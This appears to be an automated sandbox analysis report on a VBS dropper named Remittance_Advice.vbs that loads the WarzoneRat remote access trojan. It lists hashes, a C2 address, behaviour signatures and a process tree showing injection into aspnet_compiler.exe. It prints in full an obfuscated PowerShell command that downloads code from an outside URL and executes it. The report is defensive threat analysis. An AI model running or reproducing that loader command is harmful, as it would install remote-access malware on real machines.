Analysis
- max time kernel: 299s
- max time network: 283s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 23-07-2021 17:12
Static task: static1
Behavioral task: behavioral1
- Sample: Remittance_Advice.vbs
- Resource: win7v20210410
Behavioral task: behavioral2
- Sample: Remittance_Advice.vbs
- Resource: win10v20210410
General
- Target: Remittance_Advice.vbs
- Size: 875B
- MD5: fc4a8faf57b167de212a02466d0f5435
- SHA1: 8b83c8dad3b1168c37729b8c6551e7ac4d0071af
- SHA256: 84199bedc07e09ccb967692a43de715611625dc247ceea48ea2f4a7109bc5287
- SHA512: 855874d54ef794939a9c2da096dda06168f34cdb17500d762a4bbdaeb0e5ad687da86791150b83381e3617ff5ff88fb124c7b2d76c5f120b997d91206b7d18f0
Malware Config
- Extracted: https://www.maan2u.com/a/ALL.txt
- Extracted (warzonerat): 192..3.146.165:3543
Signatures
- WarzoneRat, AveMaria
  WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
- suricata: ET MALWARE PE EXE or DLL Windows file download Text
- Blocklisted process makes network request (2 IoCs)
  Processes: powershell.exe
  flow  pid  process
  8     700  powershell.exe
  17    700  powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes: powershell.exe
  description                           pid  process         target process
  PID 700 set thread context of 2616    700  powershell.exe  aspnet_compiler.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe
  pid  process
  700  powershell.exe
  700  powershell.exe
  700  powershell.exe
  700  powershell.exe
  700  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  description              pid  process
  Token: SeDebugPrivilege  700  powershell.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes: WScript.exe, powershell.exe
  description                        pid   process         target process
  PID 4048 wrote to memory of 700    4048  WScript.exe     powershell.exe
  PID 4048 wrote to memory of 700    4048  WScript.exe     powershell.exe
  PID 700 wrote to memory of 1560    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 1560    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 1560    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 2616    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 2616    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 2616    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 2616    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 2616    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 2616    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 2616    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 2616    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 2616    700   powershell.exe  aspnet_compiler.exe
  PID 700 wrote to memory of 2616    700   powershell.exe  aspnet_compiler.exe
Processes
- [depth 1] C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Remittance_Advice.vbs"
  Signatures:
  - Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://www.maan2u.com/a/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
    Signatures:
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    - [depth 3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/700-114-0x0000000000000000-mapping.dmp
- memory/700-119-0x000002172BC10000-0x000002172BC11000-memory.dmp (Filesize: 4KB)
- memory/700-123-0x00000217443D0000-0x00000217443D1000-memory.dmp (Filesize: 4KB)
- memory/700-130-0x0000021744113000-0x0000021744115000-memory.dmp (Filesize: 8KB)
- memory/700-129-0x0000021744110000-0x0000021744112000-memory.dmp (Filesize: 8KB)
- memory/700-131-0x0000021744116000-0x0000021744118000-memory.dmp (Filesize: 8KB)
- memory/700-152-0x00000217440E0000-0x00000217440F3000-memory.dmp (Filesize: 76KB)
- memory/700-153-0x0000021744100000-0x0000021744102000-memory.dmp (Filesize: 8KB)
- memory/2616-156-0x0000000000400000-0x000000000055E000-memory.dmp (Filesize: 1.4MB)
- memory/2616-157-0x0000000000405E28-mapping.dmp
- memory/2616-173-0x0000000000400000-0x000000000055E000-memory.dmp (Filesize: 1.4MB)